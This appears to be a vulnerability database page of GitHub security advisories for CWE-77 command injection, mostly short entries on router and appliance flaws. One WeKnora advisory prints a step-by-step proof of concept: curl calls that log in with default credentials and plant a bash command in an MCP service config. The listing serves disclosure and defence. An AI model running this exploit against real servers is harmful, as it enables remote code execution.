Common Weakness Enumeration

CWE-77

Allowed-with-Review

Improper Neutralization of Special Elements used in a Command ('Command Injection')

Abstraction: Class · Status: Draft

The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.

5383 vulnerabilities reference this CWE, most recent first.

GHSA-77R8-VW38-W7MX

Vulnerability from github – Published: 2022-05-17 03:42 – Updated: 2022-05-17 03:42
VLAI
Details

IBM Security QRadar SIEM 7.1.x and 7.2.x before 7.2.7 allows remote authenticated users to execute arbitrary OS commands as root via unspecified vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-2875"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-08-08T01:59:00Z",
    "severity": "HIGH"
  },
  "details": "IBM Security QRadar SIEM 7.1.x and 7.2.x before 7.2.7 allows remote authenticated users to execute arbitrary OS commands as root via unspecified vectors.",
  "id": "GHSA-77r8-vw38-w7mx",
  "modified": "2022-05-17T03:42:49Z",
  "published": "2022-05-17T03:42:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2875"
    },
    {
      "type": "WEB",
      "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988094"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/92333"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-77RH-FHXX-8GWG

Vulnerability from github – Published: 2022-05-19 00:00 – Updated: 2022-05-27 00:00
VLAI
Details

TOTOLINK A3100R V4.1.2cu.5050_B20200504 and V4.1.2cu.5247_B20211129 were discovered to contain a command injection vulnerability via the magicid parameter in the function uci_cloudupdate_config.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-29639"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-05-18T12:15:00Z",
    "severity": "HIGH"
  },
  "details": "TOTOLINK A3100R V4.1.2cu.5050_B20200504 and V4.1.2cu.5247_B20211129 were discovered to contain a command injection vulnerability via the magicid parameter in the function uci_cloudupdate_config.",
  "id": "GHSA-77rh-fhxx-8gwg",
  "modified": "2022-05-27T00:00:55Z",
  "published": "2022-05-19T00:00:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29639"
    },
    {
      "type": "WEB",
      "url": "https://github.com/shijin0925/IOT/blob/master/TOTOLINK%20A3100R/1.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-784C-XCF7-3MM9

Vulnerability from github – Published: 2022-10-14 12:00 – Updated: 2025-05-16 15:30
VLAI
Details

D-Link COVR 1200,1202,1203 v1.08 was discovered to contain a command injection vulnerability via the system_time_timezone parameter at function SetNTPServerSettings.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-42160"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-10-13T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "D-Link COVR 1200,1202,1203 v1.08 was discovered to contain a command injection vulnerability via the system_time_timezone parameter at function SetNTPServerSettings.",
  "id": "GHSA-784c-xcf7-3mm9",
  "modified": "2025-05-16T15:30:30Z",
  "published": "2022-10-14T12:00:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42160"
    },
    {
      "type": "WEB",
      "url": "https://github.com/14isnot40/vul_discovery/blob/master/D-Link%20COVR%2012xx%20.pdf"
    },
    {
      "type": "WEB",
      "url": "https://www.dlink.com/en/security-bulletin"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-784G-P98M-4MFW

Vulnerability from github – Published: 2022-02-08 00:00 – Updated: 2022-02-08 00:00
VLAI
Details

Totolink devices A3100R v4.1.2cu.5050_B20200504, A830R v5.9c.4729_B20191112, and A720R v4.1.5cu.470_B20200911 were discovered to contain command injection vulnerability in the function setNoticeCfg. This vulnerability allows attackers to execute arbitrary commands via the IpFrom parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-44247"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-02-04T02:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Totolink devices A3100R v4.1.2cu.5050_B20200504, A830R v5.9c.4729_B20191112, and A720R v4.1.5cu.470_B20200911 were discovered to contain command injection vulnerability in the function setNoticeCfg. This vulnerability allows attackers to execute arbitrary commands via the IpFrom parameter.",
  "id": "GHSA-784g-p98m-4mfw",
  "modified": "2022-02-08T00:00:38Z",
  "published": "2022-02-08T00:00:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44247"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pjqwudi/my_vuln/blob/main/totolink/vuln_1/1.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-788M-MC5J-98P8

Vulnerability from github – Published: 2023-04-02 00:30 – Updated: 2025-02-11 18:30
VLAI
Details

D-Link Go-RT-AC750 revA_v101b03 was discovered to contain a command injection vulnerability via the service parameter at soapcgi.main.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-26822"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-01T23:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "D-Link Go-RT-AC750 revA_v101b03 was discovered to contain a command injection vulnerability via the service parameter at soapcgi.main.",
  "id": "GHSA-788m-mc5j-98p8",
  "modified": "2025-02-11T18:30:59Z",
  "published": "2023-04-02T00:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26822"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yzskyt/Vuln/blob/main/Go-RT-AC750/Go-RT-AC750.md"
    },
    {
      "type": "WEB",
      "url": "https://www.dlink.com/en/security-bulletin"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7892-3F52-8277

Vulnerability from github – Published: 2024-10-15 00:30 – Updated: 2024-10-15 00:30
VLAI
Details

Netgear R7000 1.0.11.136 is vulnerable to Command Injection in RMT_invite.cgi via device_name2 parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-35520"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-14T22:15:03Z",
    "severity": "HIGH"
  },
  "details": "Netgear R7000 1.0.11.136 is vulnerable to Command Injection in RMT_invite.cgi via device_name2 parameter.",
  "id": "GHSA-7892-3f52-8277",
  "modified": "2024-10-15T00:30:57Z",
  "published": "2024-10-15T00:30:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35520"
    },
    {
      "type": "WEB",
      "url": "https://kb.netgear.com/000066027/Security-Advisory-for-Post-Authentication-Command-Injection-on-the-R7000-PSV-2023-0154"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-78F9-WRGM-7QQC

Vulnerability from github – Published: 2025-03-31 18:31 – Updated: 2025-03-31 18:31
VLAI
Details

A vulnerability, which was classified as critical, has been found in Digital China DCME-520 up to 20250320. This issue affects some unknown processing of the file /usr/local/WWW/function/audit/newstatistics/mon_merge_stat_hist.php. The manipulation of the argument type_name leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-3002"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-31T16:15:27Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability, which was classified as critical, has been found in Digital China DCME-520 up to 20250320. This issue affects some unknown processing of the file /usr/local/WWW/function/audit/newstatistics/mon_merge_stat_hist.php. The manipulation of the argument type_name leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.",
  "id": "GHSA-78f9-wrgm-7qqc",
  "modified": "2025-03-31T18:31:08Z",
  "published": "2025-03-31T18:31:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3002"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Fizz-L/CVE1/blob/main/DCME-520%20Remote%20command%20execution.md"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.302051"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.302051"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.524225"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-78G4-9XGP-8GG7

Vulnerability from github – Published: 2022-09-07 00:01 – Updated: 2022-09-09 00:00
VLAI
Details

In TOTOLINK A860R V4.1.2cu.5182_B20201027 in cstecgi.cgi, the acquired parameters are directly put into the system for execution without filtering, resulting in a command injection vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-37843"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-09-06T17:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "In TOTOLINK A860R V4.1.2cu.5182_B20201027 in cstecgi.cgi, the acquired parameters are directly put into the system for execution without filtering, resulting in a command injection vulnerability.",
  "id": "GHSA-78g4-9xgp-8gg7",
  "modified": "2022-09-09T00:00:48Z",
  "published": "2022-09-07T00:01:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-37843"
    },
    {
      "type": "WEB",
      "url": "https://github.com/1759134370/iot/blob/main/TOTOLINK/A860R/4.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-78H3-63C4-5FQC

Vulnerability from github – Published: 2026-01-09 19:21 – Updated: 2026-01-22 16:29
VLAI
Summary
WeKnora has Command Injection in MCP stdio test
Details

Vulnerability Description


Vulnerability Overview

This issue is a command injection vulnerability (CWE-78) that allows authenticated users to inject stdio_config.command/args into MCP stdio settings, causing the server to execute subprocesses using these injected values.

The root causes are as follows:

  • Missing Security Filtering: When transport_type=stdio, there is no validation on stdio_config.command/args, such as allowlisting, enforcing fixed paths/binaries, or blocking dangerous options.
  • Functional Flaw (Trust Boundary Violation): The command/args stored as "service configuration data" are directly used in the /test execution flow and connected to execution sinks without validation.
  • Lack of Authorization Control: This functionality effectively allows "process execution on the server" (an administrative operation), yet no administrator-only permission checks are implemented in the code (accessible with Bearer authentication only).

Vulnerable Code

  1. API Route Registration (path where endpoints are created) ****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/router/router.go#L85-L110 https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/router/router.go#L371-L390

    ```go // 认证中间件 r.Use(middleware.Auth(params.TenantService, params.UserService, params.Config))

    // 添加OpenTelemetry追踪中间件
    r.Use(middleware.TracingMiddleware())
    
    // 需要认证的API路由
    v1 := r.Group("/api/v1")
    {
        RegisterAuthRoutes(v1, params.AuthHandler)
        RegisterTenantRoutes(v1, params.TenantHandler)
        RegisterKnowledgeBaseRoutes(v1, params.KBHandler)
        RegisterKnowledgeTagRoutes(v1, params.TagHandler)
        RegisterKnowledgeRoutes(v1, params.KnowledgeHandler)
        RegisterFAQRoutes(v1, params.FAQHandler)
        RegisterChunkRoutes(v1, params.ChunkHandler)
        RegisterSessionRoutes(v1, params.SessionHandler)
        RegisterChatRoutes(v1, params.SessionHandler)
        RegisterMessageRoutes(v1, params.MessageHandler)
        RegisterModelRoutes(v1, params.ModelHandler)
        RegisterEvaluationRoutes(v1, params.EvaluationHandler)
        RegisterInitializationRoutes(v1, params.InitializationHandler)
        RegisterSystemRoutes(v1, params.SystemHandler)
        RegisterMCPServiceRoutes(v1, params.MCPServiceHandler)
        RegisterWebSearchRoutes(v1, params.WebSearchHandler)
    }
    

    ```

    go func RegisterMCPServiceRoutes(r *gin.RouterGroup, handler *handler.MCPServiceHandler) { mcpServices := r.Group("/mcp-services") { // Create MCP service mcpServices.POST("", handler.CreateMCPService) // List MCP services mcpServices.GET("", handler.ListMCPServices) // Get MCP service by ID mcpServices.GET("/:id", handler.GetMCPService) // Update MCP service mcpServices.PUT("/:id", handler.UpdateMCPService) // Delete MCP service mcpServices.DELETE("/:id", handler.DeleteMCPService) // Test MCP service connection mcpServices.POST("/:id/test", handler.TestMCPService) // Get MCP service tools mcpServices.GET("/:id/tools", handler.GetMCPServiceTools) // Get MCP service resources mcpServices.GET("/:id/resources", handler.GetMCPServiceResources) }

  2. User input (JSON) → types.MCPService binding (POST /api/v1/mcp-services) ****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/handler/mcp_service.go#L40-L55

    ```go var service types.MCPService if err := c.ShouldBindJSON(&service); err != nil { logger.Error(ctx, "Failed to parse MCP service request", err) c.Error(errors.NewBadRequestError(err.Error())) return }

    tenantID := c.GetUint64(types.TenantIDContextKey.String())
    if tenantID == 0 {
        logger.Error(ctx, "Tenant ID is empty")
        c.Error(errors.NewBadRequestError("Tenant ID cannot be empty"))
        return
    }
    service.TenantID = tenantID
    
    if err := h.mcpServiceService.CreateMCPService(ctx, &service); err != nil {
    

    ```

  3. Taint propagation (storage): The bound service object is stored directly in the database without sanitization. ****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/application/repository/mcp_service.go#L23-L25

    go func (r *mcpServiceRepository) Create(ctx context.Context, service *types.MCPService) error { return r.db.WithContext(ctx).Create(service).Error }

  4. Sink execution: /test endpoint loads the service from the database → executes TestMCPService

    https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/handler/mcp_service.go#L323-L325 https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/application/service/mcp_service.go#L238-L264

    ```go logger.Infof(ctx, "Testing MCP service: %s", secutils.SanitizeForLog(serviceID))

    result, err := h.mcpServiceService.TestMCPService(ctx, tenantID, serviceID)
    

    ```

    ```go service, err := s.mcpServiceRepo.GetByID(ctx, tenantID, id) if err != nil { return nil, fmt.Errorf("failed to get MCP service: %w", err) } if service == nil { return nil, fmt.Errorf("MCP service not found") }

    // Create temporary client for testing
    config := &mcp.ClientConfig{
        Service: service,
    }
    
    client, err := mcp.NewMCPClient(config)
    if err != nil {
        return &types.MCPTestResult{
            Success: false,
            Message: fmt.Sprintf("Failed to create client: %v", err),
        }, nil
    }
    
    // Connect
    testCtx, cancel := context.WithTimeout(ctx, 30*time.Second)
    defer cancel()
    
    if err := client.Connect(testCtx); err != nil {
        return &types.MCPTestResult{
    

    ```

  5. Ultimate sink (subprocess execution): The command/args values from stdio configuration are directly used in the subprocess execution path. ****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/mcp/client.go#L120-L137 https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/mcp/client.go#L158-L160

    ```go case types.MCPTransportStdio: if config.Service.StdioConfig == nil { return nil, fmt.Errorf("stdio_config is required for stdio transport") }

        // Convert env vars map to []string format (KEY=value)
        envVars := make([]string, 0, len(config.Service.EnvVars))
        for key, value := range config.Service.EnvVars {
            envVars = append(envVars, fmt.Sprintf("%s=%s", key, value))
        }
    
        // Create stdio client with options
        // NewStdioMCPClientWithOptions(command string, env []string, args []string, opts ...transport.StdioOption)
        mcpClient, err = client.NewStdioMCPClientWithOptions(
            config.Service.StdioConfig.Command,
            envVars,
            config.Service.StdioConfig.Args,
        )
    

    ```

    go if err := c.client.Start(ctx); err != nil { return fmt.Errorf("failed to start client: %w", err) }

PoC


PoC Description

  • Obtain an authentication token.
  • Create an MCP service with transport_type=stdio, injecting the command to execute into stdio_config.command/args.
  • Call the /test endpoint to trigger the Connect() → Start() execution flow, confirming command execution on the server via side effects (e.g., file creation).

PoC

  • Container state verification (pre-exploitation)

    bash docker exec -it WeKnora-app /bin/bash cd /tmp/; ls -l

    image

  • Authenticate via /api/v1/auth/login to obtain a Bearer token for API calls.

    ```bash API="http://localhost:8080" EMAIL="admin@gmail.com" PASS="admin123"

    TOKEN="$(curl -sS -X POST "$API/api/v1/auth/login" \ -H "Content-Type: application/json" \ -d "{\"email\":\"$EMAIL\",\"password\":\"$PASS\"}" | jq -r '.token // empty')"

    echo "TOKEN=$TOKEN" ```

    image

    image

  • POST to /api/v1/mcp-services with transport_type=stdio and stdio_config to define the command and arguments to be executed on the server.

    ```bash CREATE_RES="$(curl -sS -X POST "$API/api/v1/mcp-services" \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d '{ "name":"rce", "description":"rce", "enabled":true, "transport_type":"stdio", "stdio_config":{"command":"bash","args":["-lc","id > /tmp/RCE_ok.txt && uname -a >> /tmp/RCE_ok.txt"]}, "env_vars":{} }')"

    MCP_ID="$(echo "$CREATE_RES" | jq -r '.data.id // empty')" echo "MCP_ID=$MCP_ID" ```

    image

  • Invoke /api/v1/mcp-services/{id}/test to trigger Connect(), causing execution of the stdio subprocess.

    bash curl -sS -X POST "$API/api/v1/mcp-services/$MCP_ID/test" \ -H "Authorization: Bearer $TOKEN" | jq .

    image

  • Post-exploitation verification (container state)

    bash ls -l

    image

Impact


  • Remote Code Execution (RCE): Arbitrary command execution enables file creation/modification, execution of additional payloads, and service disruption
  • Information Disclosure: Sensitive data exfiltration through reading environment variables, configuration files, keys, tokens, and local files
  • Privilege Escalation/Lateral Movement (Environment-Dependent): Impact may escalate based on container mounts, network policies, and internal service access permissions
  • Cross-Tenant Boundary Impact: Execution occurs in a shared backend runtime; depending on deployment configuration, impact may extend beyond tenant boundaries (exact scope is uncertain and varies by deployment setup)
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/Tencent/WeKnora"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22688"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-09T19:21:22Z",
    "nvd_published_at": "2026-01-10T04:16:01Z",
    "severity": "CRITICAL"
  },
  "details": "### Vulnerability **Description**\n\n---\n\n**Vulnerability Overview**\n\n\nThis issue is a command\u00a0injection vulnerability (CWE-78) that allows authenticated users\u00a0to inject\u00a0stdio_config.command/args\u00a0into\u00a0MCP stdio settings, causing the server to execute\u00a0subprocesses\u00a0using these injected values.\n\nThe root causes are as follows:\n\n- **Missing\u00a0Security Filtering**: When\u00a0transport_type=stdio, there is no\u00a0validation on\u00a0stdio_config.command/args, such as allowlisting, enforcing fixed paths/binaries, or blocking dangerous options.\n- **Functional Flaw (Trust\u00a0Boundary Violation)**: The\u00a0command/args\u00a0stored\u00a0as \"service configuration data\"\u00a0are directly used in the\u00a0/test\u00a0execution flow and\u00a0connected to execution sinks without validation.\n- **Lack\u00a0of Authorization Control**: This functionality effectively allows \"process execution on the server\" (an administrative operation), yet no administrator-only permission checks are\u00a0implemented in the code (accessible with Bearer authentication only).\n\n**Vulnerable Code**\n\n1. **API Route Registration**\u00a0(path where endpoints are created)\n****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/router/router.go#L85-L110\nhttps://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/router/router.go#L371-L390\n    \n    ```go\n     // \u8ba4\u8bc1\u4e2d\u95f4\u4ef6\n    \tr.Use(middleware.Auth(params.TenantService, params.UserService, params.Config))\n    \n    \t// \u6dfb\u52a0OpenTelemetry\u8ffd\u8e2a\u4e2d\u95f4\u4ef6\n    \tr.Use(middleware.TracingMiddleware())\n    \n    \t// \u9700\u8981\u8ba4\u8bc1\u7684API\u8def\u7531\n    \tv1 := r.Group(\"/api/v1\")\n    \t{\n    \t\tRegisterAuthRoutes(v1, params.AuthHandler)\n    \t\tRegisterTenantRoutes(v1, params.TenantHandler)\n    \t\tRegisterKnowledgeBaseRoutes(v1, params.KBHandler)\n    \t\tRegisterKnowledgeTagRoutes(v1, params.TagHandler)\n    \t\tRegisterKnowledgeRoutes(v1, params.KnowledgeHandler)\n    \t\tRegisterFAQRoutes(v1, params.FAQHandler)\n    \t\tRegisterChunkRoutes(v1, params.ChunkHandler)\n    \t\tRegisterSessionRoutes(v1, params.SessionHandler)\n    \t\tRegisterChatRoutes(v1, params.SessionHandler)\n    \t\tRegisterMessageRoutes(v1, params.MessageHandler)\n    \t\tRegisterModelRoutes(v1, params.ModelHandler)\n    \t\tRegisterEvaluationRoutes(v1, params.EvaluationHandler)\n    \t\tRegisterInitializationRoutes(v1, params.InitializationHandler)\n    \t\tRegisterSystemRoutes(v1, params.SystemHandler)\n    \t\tRegisterMCPServiceRoutes(v1, params.MCPServiceHandler)\n    \t\tRegisterWebSearchRoutes(v1, params.WebSearchHandler)\n    \t}\n    ```\n    \n    ```go\n    func RegisterMCPServiceRoutes(r *gin.RouterGroup, handler *handler.MCPServiceHandler) {\n    \tmcpServices := r.Group(\"/mcp-services\")\n    \t{\n    \t\t// Create MCP service\n    \t\tmcpServices.POST(\"\", handler.CreateMCPService)\n    \t\t// List MCP services\n    \t\tmcpServices.GET(\"\", handler.ListMCPServices)\n    \t\t// Get MCP service by ID\n    \t\tmcpServices.GET(\"/:id\", handler.GetMCPService)\n    \t\t// Update MCP service\n    \t\tmcpServices.PUT(\"/:id\", handler.UpdateMCPService)\n    \t\t// Delete MCP service\n    \t\tmcpServices.DELETE(\"/:id\", handler.DeleteMCPService)\n    \t\t// Test MCP service connection\n    \t\tmcpServices.POST(\"/:id/test\", handler.TestMCPService)\n    \t\t// Get MCP service tools\n    \t\tmcpServices.GET(\"/:id/tools\", handler.GetMCPServiceTools)\n    \t\t// Get MCP service resources\n    \t\tmcpServices.GET(\"/:id/resources\", handler.GetMCPServiceResources)\n    \t}\n    ```\n    \n2. **User input (JSON) \u2192 types.MCPService binding**\u00a0(POST /api/v1/mcp-services)\n****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/handler/mcp_service.go#L40-L55\n    \n    ```go\n    \tvar service types.MCPService\n    \tif err := c.ShouldBindJSON(\u0026service); err != nil {\n    \t\tlogger.Error(ctx, \"Failed to parse MCP service request\", err)\n    \t\tc.Error(errors.NewBadRequestError(err.Error()))\n    \t\treturn\n    \t}\n    \n    \ttenantID := c.GetUint64(types.TenantIDContextKey.String())\n    \tif tenantID == 0 {\n    \t\tlogger.Error(ctx, \"Tenant ID is empty\")\n    \t\tc.Error(errors.NewBadRequestError(\"Tenant ID cannot be empty\"))\n    \t\treturn\n    \t}\n    \tservice.TenantID = tenantID\n    \n    \tif err := h.mcpServiceService.CreateMCPService(ctx, \u0026service); err != nil {\n    ```\n    \n3. **Taint propagation (storage)**: The bound service object is stored\u00a0directly in\u00a0the database without sanitization.\n****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/application/repository/mcp_service.go#L23-L25\n    \n    ```go\n    func (r *mcpServiceRepository) Create(ctx context.Context, service *types.MCPService) error {\n    \treturn r.db.WithContext(ctx).Create(service).Error\n    }\n    ```\n    \n4. **Sink execution**:\u00a0/test\u00a0endpoint loads the service from the database \u2192 executes\u00a0TestMCPService\n    \n    https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/handler/mcp_service.go#L323-L325\n    https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/application/service/mcp_service.go#L238-L264\n    \n    ```go\n    \tlogger.Infof(ctx, \"Testing MCP service: %s\", secutils.SanitizeForLog(serviceID))\n    \n    \tresult, err := h.mcpServiceService.TestMCPService(ctx, tenantID, serviceID)\n    ```\n    \n    ```go\n    \tservice, err := s.mcpServiceRepo.GetByID(ctx, tenantID, id)\n    \tif err != nil {\n    \t\treturn nil, fmt.Errorf(\"failed to get MCP service: %w\", err)\n    \t}\n    \tif service == nil {\n    \t\treturn nil, fmt.Errorf(\"MCP service not found\")\n    \t}\n    \n    \t// Create temporary client for testing\n    \tconfig := \u0026mcp.ClientConfig{\n    \t\tService: service,\n    \t}\n    \n    \tclient, err := mcp.NewMCPClient(config)\n    \tif err != nil {\n    \t\treturn \u0026types.MCPTestResult{\n    \t\t\tSuccess: false,\n    \t\t\tMessage: fmt.Sprintf(\"Failed to create client: %v\", err),\n    \t\t}, nil\n    \t}\n    \n    \t// Connect\n    \ttestCtx, cancel := context.WithTimeout(ctx, 30*time.Second)\n    \tdefer cancel()\n    \n    \tif err := client.Connect(testCtx); err != nil {\n    \t\treturn \u0026types.MCPTestResult{\n    ```\n    \n5. **Ultimate sink (subprocess execution)**: The\u00a0command/args\u00a0values from stdio configuration are directly used in the subprocess\u00a0execution path.\n****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/mcp/client.go#L120-L137\nhttps://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/mcp/client.go#L158-L160\n    \n    ```go\n    \tcase types.MCPTransportStdio:\n    \t\tif config.Service.StdioConfig == nil {\n    \t\t\treturn nil, fmt.Errorf(\"stdio_config is required for stdio transport\")\n    \t\t}\n    \n    \t\t// Convert env vars map to []string format (KEY=value)\n    \t\tenvVars := make([]string, 0, len(config.Service.EnvVars))\n    \t\tfor key, value := range config.Service.EnvVars {\n    \t\t\tenvVars = append(envVars, fmt.Sprintf(\"%s=%s\", key, value))\n    \t\t}\n    \n    \t\t// Create stdio client with options\n    \t\t// NewStdioMCPClientWithOptions(command string, env []string, args []string, opts ...transport.StdioOption)\n    \t\tmcpClient, err = client.NewStdioMCPClientWithOptions(\n    \t\t\tconfig.Service.StdioConfig.Command,\n    \t\t\tenvVars,\n    \t\t\tconfig.Service.StdioConfig.Args,\n    \t\t)\n    ```\n    \n    ```go\n    \tif err := c.client.Start(ctx); err != nil {\n    \t\treturn fmt.Errorf(\"failed to start client: %w\", err)\n    \t}\n    ```\n    \n\n### PoC\n\n---\n\n**PoC Description**\n \n- Obtain an\u00a0authentication\u00a0token.\n- Create an\u00a0MCP service\u00a0with\u00a0transport_type=stdio, injecting the command to execute into\u00a0stdio_config.command/args.\n- Call\u00a0the\u00a0/test\u00a0endpoint to trigger the\u00a0Connect()\u00a0\u2192\u00a0Start()\u00a0execution flow, confirming command execution on the server via side effects (e.g., file creation).\n\n**PoC**\n \n- **Container state verification (pre-exploitation)**\n    \n    ```bash\n    docker exec -it WeKnora-app /bin/bash\n    cd /tmp/; ls -l\n    ```\n    \n    \u003cimg width=\"798\" height=\"78\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3e387e39-cd80-4e30-ba23-3db9ff879209\" /\u003e\n    \n- **Authenticate via\u00a0/api/v1/auth/login\u00a0to obtain a Bearer token for API\u00a0calls.**\n    \n    ```bash\n    API=\"http://localhost:8080\"\n    EMAIL=\"admin@gmail.com\"\n    PASS=\"admin123\"\n    \n    TOKEN=\"$(curl -sS -X POST \"$API/api/v1/auth/login\" \\\n      -H \"Content-Type: application/json\" \\\n      -d \"{\\\"email\\\":\\\"$EMAIL\\\",\\\"password\\\":\\\"$PASS\\\"}\" | jq -r \u0027.token // empty\u0027)\"\n      \n    echo \"TOKEN=$TOKEN\"\n    ```\n    \n    \u003cimg width=\"760\" height=\"73\" alt=\"image\" 